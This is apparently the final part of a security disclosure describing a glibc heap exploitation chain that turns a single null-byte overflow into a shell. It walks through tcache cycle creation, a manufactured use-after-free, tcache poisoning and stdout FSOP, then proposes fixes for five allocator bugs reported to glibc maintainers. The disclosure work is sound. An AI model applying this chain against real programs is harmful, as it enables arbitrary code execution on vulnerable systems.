▼ fake chunk (fd=bk=self, size=0x501)
│ all integrity checks satisfied
▼ PREV_INUSE cleared on victim
│
▼ _int_free_merge_chunk: backward consolidation
merged chunk 0xA00 at prev_user → unsorted bin
│
▼ overlap: prev handle over free merged chunk
read unsorted bin fd → libc base
│
▼ carve E from overlap, free to tcache
Bug 4 (lazy init): E_user computable → safe_key known
write PROTECT_PTR(E,E) to E->next through overlap
Bug 1 (no cycle detection): tcache[0x90] = E→E→E→...
│
▼ double pop: A=E_user, B=E_user
Bug 2 (no count bound): num_slots = 8, exceeds max
│
▼ free(A): re-free E_user
Bug 3 (key clearing bypasses gate): verify skipped
Bug 2 (inflated count): tcache_put accepted
write(B): UAF write to freed tcache metadata
│
▼ tcache poison: E->next → tracking_table
two pops → arbitrary allocation at tracking_table
│
▼ arbitrary R/W via tracking_table overlay
│
▼ FSOP: corrupt stdout
_flags, _lock, _wide_data, vtable
fake _IO_wide_data → fake _wide_vtable
__doallocate (+0x68) → win()
│
▼ shell
What makes this different.
Existing techniques such as null byte poisoning and PREV_INUSE tricks produce chunk overlap and apply tcache poisoning from that overlap. They still need to read freed memory to recover the safe-linking key. One shot. Fixed geometry.
Schrödinger's Chunk synthesizes a genuine use-after-free from a program that has none. The manufactured UAF is a persistent read/write handle to freed memory, independent of the overlap region. Safe-linking key recovery is eliminated entirely. Bug 4 makes the key a function of heap base alone.
Three of the five bugs (1, 2, 3) interact tightly:
- Bug 1 without Bug 2: the loop exists but the inflated num_slots is absent, and the re-free may be rejected by the capacity guard.
- Bug 1 without Bug 3: the loop exists, but Stage 2 of double-free detection finds E in the list on the first scan iteration and aborts.
- Bug 3 without Bug 1: the detection gate is bypassable only because the key was cleared by the pop, which only happened because the loop returned E twice.
The chain is multiplicative. Each bug is load-bearing.
Bug summary and proposed fixes.
| # | Location | Defect | Proposed fix |
|---|---|---|---|
| 1 | tcache_put_n, tcache_get_n | No cycle detection in tcache freelist | Check in tcache_put that the new entry address differs from any existing entry. Or in tcache_get, verify the returned address differs from the previous return. |
| 2 | tcache_get_n | num_slots++ has no upper bound | Clamp to mp_.tcache_count on every increment. |
| 3 | tcache_get_n, __libc_free | e->key = 0 on every pop defeats the double-free gate | Remove the key based gate and always walk the list. Or defer key clearing until re-free rather than on pop. |
| 4 | tcache_free_init, tcache_init | Lazy init creates a fully deterministic heap layout | Add randomized padding before tcache struct allocation to break layout determinism. |
| 5 | tcache_put_n | entries[] head pointers stored raw while next fields use PROTECT_PTR | Apply PROTECT_PTR consistently to head pointer assignments in the non-mangled path. |
Conclusion.
Schrödinger's Chunk demonstrates that the heap exploitation landscape on modern glibc is not settled. A performance optimization (lazy tcache init) made safe-linking keys computable. Removing one allocation path (fastbins) concentrated all small-chunk traffic onto a path with five linked defects. A single null byte is enough to start the chain. A program with no UAF, no double-free, and every compiler mitigation active ends with a shell.
The five bugs were reported to the glibc security team prior to this publication.